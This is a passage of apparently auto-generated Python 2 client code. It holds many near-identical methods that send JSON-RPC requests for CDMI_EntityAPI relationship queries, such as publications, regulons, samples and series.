request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Provided(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Provided',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_WasProvidedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_WasProvidedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PublishedAssociation(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PublishedAssociation',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AssociationPublishedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AssociationPublishedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PublishedExperiment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PublishedExperiment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ExperimentPublishedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ExperimentPublishedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PublishedProtocol(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PublishedProtocol',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ProtocolPublishedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ProtocolPublishedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulogHasRegulon(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulogHasRegulon',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulonIsInRegolog(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulonIsInRegolog',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulomeHasGenome(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulomeHasGenome',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_GenomeIsInRegulome(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_GenomeIsInRegulome',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulomeHasRegulon(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulomeHasRegulon',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulonIsInRegolome(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulonIsInRegolome',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulomeSource(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulomeSource',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_CreatedRegulome(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_CreatedRegulome',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_RegulonHasOperon(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_RegulonHasOperon',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_OperonIsInRegulon(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_OperonIsInRegulon',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleAveragedFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleAveragedFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleComponentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleComponentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleContactPerson(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleContactPerson',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PersonPerformedSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PersonPerformedSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleHasAnnotations(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleHasAnnotations',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AnnotationsForSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AnnotationsForSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleInSeries(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleInSeries',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SeriesWithSamples(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SeriesWithSamples',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleMeasurements(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleMeasurements',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_MeasurementInSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_MeasurementInSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SamplesInReplicateGroup(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SamplesInReplicateGroup',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ReplicateGroupsForSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ReplicateGroupsForSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SeriesPublishedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SeriesPublishedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PublicationsForSeries(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PublicationsForSeries',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Shows(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Shows',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
